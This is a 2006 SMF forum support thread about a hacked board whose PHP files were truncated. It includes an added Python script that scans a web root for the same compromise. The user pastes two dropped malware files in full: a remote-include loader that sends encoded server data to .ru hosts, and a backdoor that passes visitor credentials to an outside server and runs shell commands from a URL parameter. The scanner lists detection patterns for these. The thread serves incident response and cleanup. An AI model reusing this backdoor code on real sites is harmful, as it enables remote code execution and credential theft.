Error Parse error: syntax error, unexpected $end in index.php

Started by PioneeR, June 24, 2006, 03:35:33 AM


PioneeR

Not touched the board in ages.. now I get this error??

Parse error: syntax error, unexpected $end in /home/***/public_html/yabbse/index.php on line 213

Any ideas??

Thanks


jerm


PioneeR

Sorry forgot about that.. 1.07. Just got shoutbox and online users.

Was fine last night, got a few emails today from various members this morning saying about this error?

PioneeR


zosont

Almost impossible to debug that kind of error message without going through the source commenting out blocks of code to see where the problem is arising.

PioneeR

Hi,
Just had a look, and it seems a load of files were 'updated' at the time this error started.
Going to try a restore  :D


GTSdll

---> GTSdll Homepage [nofollow] <---

PioneeR

Just looked thru these updated files. Looks like they have been truncated. Quite a few in various subdirectories too.

Will have a look at the above link.

PioneeR

Just been trying to replace the odd file with the default SimpleMachines one. It looks like a load of .php have been truncated almost chopped in half?!

Very odd indeed. Looks like it happened just before 1am this morning.

In my tmp directory I have two files too (again created at the same time)..

create.php

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

and

base.php

<?php
error_reporting
(0);
if(isset(
$_POST["l"]) and isset($_POST["p"])){
    if(isset(
$_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{
$user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
}else{
$user_auth="";}
if(!isset(
$_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(
base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
{
    if(isset(
$_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if(
$_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


Anything to do with my problems??

GTSdll

That code looks pretty suspicious.

It seems to try contacting another remote php script (http://bis.iframe.ru/master.php [nofollow]) with some arguments.
(like REMOTE_ADDR, SERVER_NAME & $user_auth)

* GTSdll suspects a hacking attempt.

winrules

Delete those files immediately, clear out the bad code from your .htaccess files, and reupload all SMF files. You should also change all passwords. More information can be found here.


winrules
SMF Developer
               
My Mods
Please do not PM me for support.


PioneeR

Hi,
Have just gone thru zapping any files that were changed at around 1am this morning.

Changed password.

Changed perms on folders (been set to read/write/exec!)

Requested restore from host.

Thanks for all your help!
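
A triage pass over the web root for the symptoms reported in this thread (files changed around the same time, .php files cut short, and dropped scripts that include a base64-decoded target or run a request parameter as a command), as an added example that is not part of the original posts or of SMF. The function names, the brace-count heuristic for truncation and the extra `exec`/`passthru`/`shell_exec` names are assumptions of this sketch.

```python
import os
import re
import sys
from datetime import datetime, timedelta

# Patterns taken from the two dropped files quoted in this thread.
INDICATORS = {
    "include of a base64-decoded target": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\s*\(", re.I),
    "shell command built from request input": re.compile(
        r"\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
}

def looks_truncated(text):
    """Heuristic (assumption): a PHP file cut off mid-way has more '{' than '}'."""
    return text.count("{") > text.count("}")

def scan_file(path, start, end):
    """Return the reasons a single PHP file deserves a closer look."""
    reasons = []
    mtime = datetime.fromtimestamp(os.path.getmtime(path))
    if start <= mtime <= end:
        reasons.append("modified inside incident window")
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    reasons += [name for name, rx in INDICATORS.items() if rx.search(text)]
    if looks_truncated(text):
        reasons.append("unbalanced braces (possibly truncated)")
    return reasons

def triage(root, start, end):
    """Walk root and map each suspicious .php path to its list of reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                reasons = scan_file(path, start, end)
                if reasons:
                    findings[path] = reasons
    return findings

if __name__ == "__main__":
    # Usage: triage.py <webroot> "<YYYY-MM-DD HH:MM>" [window_minutes]
    centre = datetime.strptime(sys.argv[2], "%Y-%m-%d %H:%M")
    half = timedelta(minutes=int(sys.argv[3]) if len(sys.argv) > 3 else 30)
    for path, reasons in sorted(triage(sys.argv[1], centre - half, centre + half).items()):
        print(path, "->", "; ".join(reasons))
```

The script only reports; flagged files still need comparing against a clean copy of the release before anything is deleted or restored.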

PioneeR


winrules

Quote from: PioneeR - June 24, 2006, 01:09:34 PM
how did they get in?

Haven't been hacked before :(
I don't really know how it's getting in. It doesn't seem to be an issue with SMF though, since there are other reports of it with people not using SMF.




PioneeR

Yeah, I read about all kinds of scripts being infected. Doesn't look good though :(

My forum is back up now though :)

PioneeR

Another site has been hit.. this time a mambo one :(

At least I know what to do this time!
